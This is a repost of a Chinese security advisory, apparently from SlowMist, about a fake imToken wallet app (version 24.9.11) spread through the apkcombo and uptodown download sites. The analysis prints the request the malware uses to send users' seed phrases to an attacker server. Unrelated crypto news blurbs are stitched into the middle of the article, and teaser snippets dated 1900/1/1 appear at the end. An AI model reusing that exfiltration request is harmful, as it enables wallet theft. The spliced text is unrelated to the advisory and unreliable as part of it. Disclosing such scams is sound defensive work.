慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。
原文:https://foresightnews.pro/article/h5Detail/31716
作者:山&耀
转自:ForesightNews
背景
基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。
当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。
Web3自由职业者招聘和远程工作平台DeeLance完成85万美元预售轮融资:金色财经报道,Web3自由职业者招聘和远程工作平台DeeLance宣布完成85万美元预售轮融资,该平台可以将自由职业者和雇主联系起来,同时可以把自由职业者的工作产品代币化为 NFT,从而允许用户安全可靠地转移工作所有权,并利用基于区块链技术的透明度和安全性解决了数字自由职业领域里版权侵权和支付欺诈等问题。(insidebitcoins)[2023/5/15 15:02:56]
俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?
Web3 基础设施协议 Ankr 将为 Optimism 提供 RPC 服务:6月16日消息,Web3 基础设施协议 Ankr 宣布将为 Optimism 提供 RPC(远程过程调用)服务。Ankr 表示,Ankr 将提供一个由许多在全球范围内运行的独立区块链节点组成的,地理上的分布式和去中心化的 Optimism RPC,以实现低延迟和可靠的连接。Ankr 还表示,将为 Optimism 开发者省去建立节点的工作、提供对高级工具的访问权限以及为需要访问 Optimism 的应用和开源软件提供支持等。[2022/6/16 4:30:45]
网站分析
鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?
美国前驻华大使:上海有足够的人才成为web3领先城市:金色财经报道,美国前驻华大使特里·布兰斯塔德在2022年5月20日举行的ETH上海会议上表示,像丹佛、迈阿密等美国各州城市都在竞争成为加密和web3领先城市。中国上海也有足够的人才和专业知识成为web3领先城市。[2022/5/20 3:29:52]
我们先看下apkcombo的流量有多大:
据数据统计站点similarweb统计,apkcombo站点:
全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:
那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app
Web3消息推送应用Notifi完成250万美元种子轮融资:3月4日消息,Web3消息推送应用Notifi完成250万美元种子轮融资,Race Capital和Hashed领投。据悉,Notifi 是一个消息推送类应用,其为所有 Web3 项目充当通信层,使得项目可以与用户通过短信、电子邮件等方式进行互动。Notifi 在早期专注于 Solana 和 Terra 生态系统。[2022/3/4 13:36:36]
由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app
声音 | Ciecle CEO: 加密货币将使Web网络看起来像场实验:据CCN消息,Circle创始人兼首席执行官Jeremy Allaire近日在接受CNBC采访时表示,一切事物都将被标记化(tokenized),他断言,即使是传统股票这类资产,最终也会被标记化,从而便于记载到区块链上。他强调这十分重要,甚至认为,使用数字货币来标记现实世界的资产将“使web网络看起来像一场可爱的实验。”[2018/10/13]
上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。
在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android
我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:
钱包分析
在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。
我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向APK代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>
看下图,最早的「api.funnel.rocks」证书出现在2022-06-03,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
总结
目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。
同时,如需使用钱包,请务必认准以下主流钱包App官方网址:
imToken钱包:https://token.im/TokenPocket钱包:https://www.tokenpocket.pro/TronLink钱包:https://www.tronlink.org/比特派钱包:https://bitpie.com/MetaMask钱包:https://metamask.io/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。
致谢:感谢在溯源过程中imToken官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。
?
公众号:小七财圈为什么$ordi这么值得关注?BRC20对比ERC20存在哪些优点呢?1.作为BTC链上原生第一meme代币,天生就拥有炒作性.
1900/1/1 0:00:00渣打银行表示,加密冬天已经结束,到明年年底,比特币的价格可能达到每枚硬币10万美元。这家全球银行的分析师已经确定了导致加密货币价格飙升的几个因素,包括最近银行业的动荡.
1900/1/1 0:00:00根据JulSwap(JULD)官方公告,JulSwap(JULD)将按照1:1兑换为新合约代币。Gate.io将支持此次合约兑换,并为用户提供代币兑换服务。平台内用户无需任何操作即可完成兑换.
1900/1/1 0:00:004月26日消息,周三,纽约联邦储备银行(NYFed)限制了其逆回购计划(RRP)的交易对手标准,此举可能会阻止稳定币发行商Circle获得美联储贷款.
1900/1/1 0:00:00PepeCoin是一种新推出的memecoin,由于其巨大的市场收益,在过去几天一直是投资者感兴趣的焦点.
1900/1/1 0:00:00随着四月即将结束,加密领域的大部分资产都在巩固年初以来的涨幅,部分数字资产可能未能引起投资者的关注。由于加密货币交易者和投资者的关注价格急剧下降.
1900/1/1 0:00:00